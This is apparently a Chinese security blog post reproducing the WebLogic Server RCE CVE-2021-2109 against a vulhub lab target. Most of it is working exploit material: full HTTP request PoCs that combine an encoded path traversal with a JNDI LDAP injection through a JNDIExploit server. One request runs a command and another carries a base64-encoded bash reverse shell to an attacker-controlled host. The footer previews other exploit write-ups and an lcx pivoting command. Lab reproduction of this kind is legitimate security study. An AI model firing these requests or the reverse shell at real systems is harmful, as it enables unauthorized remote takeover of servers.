Weblogic Server远程代码执行(CVE-2021-2109 )复现

漏洞复现
漏洞复现
发布日期:   2021-01-22

Weblogic Server远程代码执行(CVE-2021-2109 )复现

使用vulhub里的weblogic靶场进行搭建。

http://192.168.74.133:7001/console/

漏洞复现:

启动LDAP

下载地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

之前由于默认的http端口是8080,被占用了,一直失败。

命令执行poc:

GET /console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.74;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.74.133:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
cmd: id
Cookie: ADMINCONSOLESESSION=xW4n-1_PuKUs3rUPdlYo4_X_2ilcB5HpXV2qfdoSZv_SjirDzClG!-43656500; ADMINCONSOLESESSION=40qjgK0JDLcztQpXWqL16VQ9JH28bNxPT3n7hm2kDW6B8yXKnVKr!-668763435
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

反弹shell poc:

GET /console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.74;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.74.133:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
cmd: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc0LjEvMjMzMDAgMD4mMQ==}|{base64,-d}|{bash,-i}
Cookie: ADMINCONSOLESESSION=xW4n-1_PuKUs3rUPdlYo4_X_2ilcB5HpXV2qfdoSZv_SjirDzClG!-43656500; ADMINCONSOLESESSION=40qjgK0JDLcztQpXWqL16VQ9JH28bNxPT3n7hm2kDW6B8yXKnVKr!-668763435
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

其中cmd的值是bash -i >& /dev/tcp/192.168.74.1/23300 0>&1

base64编码之后的结果。

编码站点 http://www.jackson-t.ca/runtime-exec-payloads.html

先在vps上监听端口:

执行poc

成功反弹。

文章作者: Danie1
文章链接: https://danie1233.github.io/2021/01/22/Weblogic%20Server%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%EF%BC%88CVE-2021-2109%20%EF%BC%89%E5%A4%8D%E7%8E%B0/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Danie1 !
漏洞复现
 上一篇
Apache Druid 远程命令执行漏洞复现 Apache Druid 远程命令执行漏洞复现
Apache Druid 远程命令执行漏洞复现 使用docker搭建环境 docker pull fokkodriesprong/docker-druid docker run --rm -i -p 8888:8888 fokkodries
2021-02-02 漏洞复现
命令执行 漏洞复现
下一篇 
内网渗透中转发工具总结 内网渗透中转发工具总结
内网渗透中转发工具总结 LCX转发 内网机器上执行:lcx.exe –slave 公网IP +端口 内网IP +端口 lcx.exe -slave 192.168.43.142 51 192.168.43.137 3389 将内网(192
2020-12-30 内网渗透
内网渗透 红蓝对抗
  目录